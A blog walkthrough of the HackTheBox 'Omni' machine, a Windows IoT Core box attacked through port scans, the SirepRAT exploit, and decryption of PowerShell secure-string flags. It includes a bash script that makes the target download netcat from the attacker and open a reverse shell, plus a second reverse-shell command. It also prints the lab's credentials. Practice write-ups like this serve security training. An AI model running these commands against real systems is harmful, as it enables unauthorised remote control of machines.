thewhiteh4t's Blog

HackTheBox Omni Walkthrough

Omni is a very interesting and unique box featuring windows IoT platform and powershell based secure strings.

--- Name       : Omni -----------
--- IP Address : ---
--- Platform   : Windows IoT ----
--- Difficulty : Easy -----------


Fast scan using FinalRecon followed by full port range scan and service scans using nmap

$ finalrecon --ps

 ______  __   __   __   ______   __
/\  ___\/\ \ /\ "-.\ \ /\  __ \ /\ \
\ \  __\\ \ \\ \ \-.  \\ \  __ \\ \ \____
 \ \_\   \ \_\\ \_\\"\_\\ \_\ \_\\ \_____\
  \/_/    \/_/ \/_/ \/_/ \/_/\/_/ \/_____/
 ______   ______   ______   ______   __   __
/\  == \ /\  ___\ /\  ___\ /\  __ \ /\ "-.\ \
\ \  __< \ \  __\ \ \ \____\ \ \/\ \\ \ \-.  \
 \ \_\ \_\\ \_____\\ \_____\\ \_____\\ \_\\"\_\
  \/_/ /_/ \/_____/ \/_____/ \/_____/ \/_/ \/_/

[>] Created By : thewhiteh4t
[>] Version    : 1.0.7

[+] Checking for Updates...[ Up-To-Date ]

[+] Target :

[!] Starting Port Scan...

[+] Testing Top 1000 Ports...

[+] 135    epmap
[+] 8080   http-alt

[+] Completed in 0:00:03.528434
$ nmap -p- -T4 -Pn

Nmap scan report for
Host is up (0.082s latency).
Not shown: 65529 filtered ports
135/tcp   open  msrpc
5985/tcp  open  wsman
8080/tcp  open  http-proxy
29817/tcp open  unknown
29819/tcp open  unknown
29820/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 90.70 seconds
$ nmap -p 135,5985,8080,29817,29819,29820 -sV -T4 -Pn

Nmap scan report for
Host is up (0.082s latency).

135/tcp   open  msrpc    Microsoft Windows RPC
5985/tcp  open  upnp     Microsoft IIS httpd
8080/tcp  open  upnp     Microsoft IIS httpd
29817/tcp open  unknown
29819/tcp open  arcserve ARCserve Discovery
29820/tcp open  unknown
Service Info: Host: PING; OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 83.61 seconds

At this point I found that it is running Windows and Microsoft IIS Server. Next I accessed port 8080 in the browser and it shows a Basic HTTP Authentication prompt with an interesting string : "Windows Device Portal"

Windows Device Portal

The Windows Device Portal (WDP) is a web server included with Windows devices that lets you configure and manage the settings for the device over a network or USB connection (local connections are also supported on devices with a web browser). These windows devices include XBox, HoloLens and IoT.

The documentation also shows set up instructions for "Windows 10 IoT Dashboard". This discovery lead to another discovery, Windows 10 IoT Core, it is a trimmed down version of windows 10 which is optimized for smaller devices without a display and supports ARM/x86/x64 architectures.

Now I started looking for vulnerabilities and exploits for this OS and came across SirepRAT.

SirepRat exploits the Sirep Test Service that’s built in and running on the official images offered at Microsoft’s site. This service is the client part of the Hardware Lab Kit (HLK) setup one may build in order to perform driver/hardware tests on the IoT device. It serves the Sirep/WPCon/TShell protocol.

Read More
Download SirepRat

# Get system information from device

$ python GetSystemInformationFromDevice
# Command Execution

$ python LaunchCommandWithOutput --return_output --cmd "C:\Windows\System32\hostname.exe"


For getting a reverse shell I created a small script to make things easier and automated, below is the code...



echo "[+] Starting Python Server..."
(python3 -m http.server $SRVPORT > /dev/null 2>&1) &

echo "[+] Uploading Binary..."
python $RHOST LaunchCommandWithOutput --return_output --cmd "cmd.exe" --args " /c powershell Invoke-WebRequest -OutFile c:\windows\system32\nc64.exe -Uri http://$LHOST:$SRVPORT/nc64.exe" --v > /dev/null

echo "[+] Triggering Reverse Shell..."
(sleep 2 && python $RHOST LaunchCommandWithOutput --return_output --cmd "cmd.exe" --args " /c nc64.exe $LHOST $LPORT -e cmd.exe" --v > /dev/null) &

echo "[+] Starting Listener..."
nc -lvp $LPORT

It automatically uploads 64 bit version of netcat to the target machine and executes it and catches the shell with netcat.


I switched to powershell and extracted some basic information about the target like username, computer name and most importantly powershell version because command syntax differs from version to version, below we can see it's version 5.1


Since we have admin privileges I tried to read the root flag...

Similar content was present in user flag as well so I enumerated further and found an interesting file which again contains similar content but it looks like admin credentials...

On further enumeration I found a hidden file and this is where powershell is extremely useful...

ls -force

Here as you can see i got credentials for administrator! If you remember I found HTTP basic auth before I tried to login with these credentials and got access to the IoT dashboard!

Privilege Escalation

Using the Run Command functionality in the dashboard I got a new reverse connection as administrator this time!

c:\windows\system32\nc64.exe 4444 -e powershell.exe

At this point all I had to do was figure out how to decrypt powershell secure string. After numerous google searches I found these articles which helped in understanding the secure strings and ways to decode them

Read more
Decrypt PowerShell Secure String Password
Using the PowerShell Get-Credential Cmdlet and all things credentials

I found two credentials earlier, to decode user flag I logged in as "app" in the dashboard and to decode root flag I logged in as "administrator" with their respective passwords and launched two separate netcat sessions to catch reverse shells, this can be done without using reverse shell, directly from the web console too!

# User Flag [app:mesh5143]

$flag = Import-Clixml -Path C:\Data\Users\app\user.txt

# Root Flag [administrator:_1nt3rn37ofTh1nGz]

$flag = Import-Clixml -Path C:\Data\Users\administrator\root.txt